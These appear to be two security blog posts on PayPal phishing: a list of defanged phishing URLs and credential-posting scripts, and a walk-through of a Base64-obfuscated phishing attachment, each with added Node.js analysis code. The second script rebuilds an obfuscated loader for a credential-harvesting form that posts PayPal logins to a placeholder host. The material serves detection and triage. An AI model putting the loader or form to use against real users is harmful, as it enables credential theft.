
Sunday, April 9, 2017

Collection of Paypal Phishes seen by @neonprimetime

Below is a timelined collection of Paypal phishes seen by @neonprimetime. Each entry records when the page was seen live, the defanged URL, the folder and page name, where the sample came from, the page's meta title and author, and the script(s) the credential form posts to.

Seen Live on: 4/12/2017
Url: hxxp://ga2017[.]com/misc/wp.php
Folder: misc
Page: wp.php
Source: @malware_traffic
Meta Page Title: Log in to your PɑyPɑl ɑccount
Meta Page Author: None
Post page(s): wp.php



Seen Live on: 4/9/2017
Url: hxxp://www.paypal[.]com[.]cgi-bin.w3bscrcmd222f91e14e61be374f236df6bd32e71434.456b6064cc4ba375cc0d415be95807ecdeed6789.2488b2cc5808b734242446e29e5e0ca8.5555b2aa5708b14344143e29e51011.gurame.com.sg/.string/w3b.login.cmd/
Folder: w3b.login.cmd
Page: Default
Source: PhishTank.com
Meta Page Title: Log in to your PayPal account
Meta Page Author: DecrypteD
Post page(s): inc/visit.php , inc/login.php



Seen Live on: 4/9/2017
Url: hxxp://opthimpro[.]ru/RU/support/9f22ee9c5bc81fc8c71373bc861d0bbeZDZmOTI1MDEzZWZmOWUxNjA0N2IwOTZjNjI1MzNhZWU=/myaccount/websc_verification/
Folder: websc_verification
Page: Default
Source: PhishTank.com
Meta Page Title: Empty
Meta Page Author: None
Post page(s): Templates/MO_VBV.php
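The records above share two tells worth checking mechanically: a brand name buried in a hostname that is not actually under the brand's domain (the long `www.paypal[.]com[.]cgi-bin...gurame.com.sg` entry), and a page title spelled with look-alike non-ASCII letters (the `PɑyPɑl` title uses U+0251, not a plain "a"). The following Node.js script is an added example, not code from the original post: it parses entries written in the post's own "Key: value" layout, undoes the `hxxp` / `[.]` defanging so the WHATWG URL parser accepts them, and flags both tricks. The three sample records are copied from the list above; the field names, function names and the `paypal` brand parameter are this example's own choices.

```javascript
"use strict";

// Constructed input: three of the post's records, in its "Key: value" layout.
const SAMPLE_RECORDS = `Seen Live on: 4/12/2017
Url: hxxp://ga2017[.]com/misc/wp.php
Folder: misc
Page: wp.php
Source: @malware_traffic
Meta Page Title: Log in to your PɑyPɑl ɑccount
Meta Page Author: None
Post page(s): wp.php

Seen Live on: 4/9/2017
Url: hxxp://www.paypal[.]com[.]cgi-bin.w3bscrcmd222f91e14e61be374f236df6bd32e71434.456b6064cc4ba375cc0d415be95807ecdeed6789.2488b2cc5808b734242446e29e5e0ca8.5555b2aa5708b14344143e29e51011.gurame.com.sg/.string/w3b.login.cmd/
Folder: w3b.login.cmd
Page: Default
Source: PhishTank.com
Meta Page Title: Log in to your PayPal account
Meta Page Author: DecrypteD
Post page(s): inc/visit.php , inc/login.php

Seen Live on: 4/9/2017
Url: hxxp://opthimpro[.]ru/RU/support/9f22ee9c5bc81fc8c71373bc861d0bbeZDZmOTI1MDEzZWZmOWUxNjA0N2IwOTZjNjI1MzNhZWU=/myaccount/websc_verification/
Folder: websc_verification
Page: Default
Source: PhishTank.com
Meta Page Title: Empty
Meta Page Author: None
Post page(s): Templates/MO_VBV.php
`;

// Undo the defanging used in the post (hxxp -> http, [.] -> .) so the URL parser accepts it.
function refang(url) {
  return url.replace(/^hxxp/i, "http").replace(/\[\.\]/g, ".");
}

// Split the text into blank-line separated records, and each record into key/value pairs
// (split on the first ": ", so the "://" inside the Url value is left alone).
function parseRecords(text) {
  return text.trim().split(/\n\s*\n/).map((block) => {
    const rec = {};
    for (const line of block.split("\n")) {
      const idx = line.indexOf(": ");
      if (idx === -1) continue;
      rec[line.slice(0, idx).trim()] = line.slice(idx + 2).trim();
    }
    rec.postPages = (rec["Post page(s)"] || "").split(",").map((s) => s.trim()).filter(Boolean);
    return rec;
  });
}

// Flag (1) a hostname that contains the brand name but is not the brand's domain or a
// subdomain of it, and (2) a page title carrying non-ASCII characters, which is how
// look-alike letters such as U+0251 slip past a casual glance.
function analyze(rec, brand = "paypal") {
  const u = new URL(refang(rec.Url));
  const host = u.hostname.toLowerCase();
  const underBrand = host === `${brand}.com` || host.endsWith(`.${brand}.com`);
  const title = rec["Meta Page Title"] || "";
  return {
    seen: rec["Seen Live on"],
    host,
    path: u.pathname,
    brandInHost: host.includes(brand),
    impersonatesBrand: host.includes(brand) && !underBrand,
    nonAsciiTitle: /[^\x00-\x7f]/.test(title),
    postPages: rec.postPages,
  };
}

function analyzeAll(text = SAMPLE_RECORDS) {
  return parseRecords(text).map((rec) => analyze(rec));
}

for (const r of analyzeAll()) console.log(JSON.stringify(r));
```

The host check deliberately avoids any public-suffix list: "is this host `paypal.com` or under it" is the only question that matters, and it catches the `paypal.com.cgi-bin...` trick no matter how many labels are stacked in front of the real registered domain. The title check only says "non-ASCII present"; a second pass with a confusables table would tell you which letters were substituted.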





Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, October 26, 2015

Walking Thru a Phishing Email Attachment

Here's a walk-through of how I look at a phishing email attachment.

There was a McAfee alert 'HTML/Phishing.b' on a file called 'form.html'. This likely came from a user opening/clicking on an attachment in an email.

Since McAfee had marked it as infected and deleted it, the file was no longer in the folder where the alert had triggered. But it was still in the McAfee Quarantine folder as a .bup, so I was able to extract it like this.

The file that came back was this ugly JavaScript, obfuscated and hard to read. At a high level, the document contains a massively long Base64-encoded variable, which the JavaScript then decodes and de-obfuscates into working HTML that the user's browser or email client would display.

I know this because I see at the bottom the JavaScript call 'document.write', which is used to write raw HTML to a page. To be safe, I didn't want to run this JavaScript as-is, so I re-saved it with 'document.write' changed to 'console.log'. This lets me see the HTML without the browser actually rendering it (much safer). Then I hit F12 to open the Firefox developer tools, reloaded the JavaScript, and saw in the Console tab that the HTML was printed out for me.

After the JavaScript runs, the HTML displayed is this. It's an HTML form styled nicely to phish Paypal credentials and send them to an .ru (Russian) website.
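The swap of `document.write` for `console.log` can be done without editing the sample: run the loader with a stand-in `document` whose `write()` records what it is given, then inspect the captured HTML for where the form actually posts. The Node.js script below is an added example, not the attachment from the post or the author's own steps. The loader it runs is a constructed stand-in built the same way the post describes (a long Base64 blob decoded and handed to `document.write`); the form action points at the reserved `example.net` domain rather than any real collection host, and all function names are this example's own.

```javascript
"use strict";

// Constructed stand-in for the attachment's payload: the phishing form, which will be
// Base64-encoded and handed to document.write by a small loader. The action uses a
// placeholder host (example.net); the real sample posted to a .ru site.
const PHISH_HTML =
  '<html><body><form method="post" action="http://paypal-secure.example.net/login.php">' +
  'Email <input name="login_email"> Password <input name="login_password" type="password">' +
  '<input type="submit" value="Log In"></form></body></html>';

const B64 = Buffer.from(PHISH_HTML, "utf8").toString("base64");

// The loader, written the way such attachments typically are: a long Base64 blob split
// into pieces, reassembled, decoded, and written straight into the page.
const SAMPLE_SCRIPT =
  'var p = ["' + B64.slice(0, 40) + '", "' + B64.slice(40) + '"];\n' +
  'var d = atob(p.join(""));\n' +
  'document.write(d);\n';

// Run the loader with a stand-in "document" whose write() records instead of rendering.
// Same idea as editing document.write into console.log, but the sample is untouched.
// Caveat: new Function still executes the script with this process's privileges; it is a
// capture trick, not an isolation boundary, so do this on an isolated analysis machine.
function runCapturingWrites(script) {
  const writes = [];
  const fakeDocument = {
    write: (s) => { writes.push(String(s)); },
    writeln: (s) => { writes.push(String(s) + "\n"); },
  };
  const fakeWindow = { document: fakeDocument };
  // Passing "document" and "window" as parameters shadows any real globals of that name.
  new Function("document", "window", script)(fakeDocument, fakeWindow);
  return writes.join("");
}

// Pull every <form action=...> target out of the captured HTML.
function extractFormActions(html) {
  const re = /<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi;
  const actions = [];
  let m;
  while ((m = re.exec(html)) !== null) actions.push(m[1]);
  return actions;
}

// Report form targets that are not under the brand the page claims to be. Relative or
// unparsable targets are returned too, since they post back to the phishing host itself.
function flagExternalActions(html, brandDomain = "paypal.com") {
  return extractFormActions(html).filter((action) => {
    let host;
    try {
      host = new URL(action).hostname.toLowerCase();
    } catch (e) {
      return true;
    }
    return !(host === brandDomain || host.endsWith("." + brandDomain));
  });
}

const captured = runCapturingWrites(SAMPLE_SCRIPT);
console.log(captured);
console.log("form targets not under paypal.com:", flagExternalActions(captured));
```

Because the decoded HTML is only ever a string here, nothing is rendered, no image or script it references is fetched, and the form never appears on screen; the output is the same HTML the author saw in the Firefox console, plus the one line that matters for triage: where the credentials would have gone.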

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.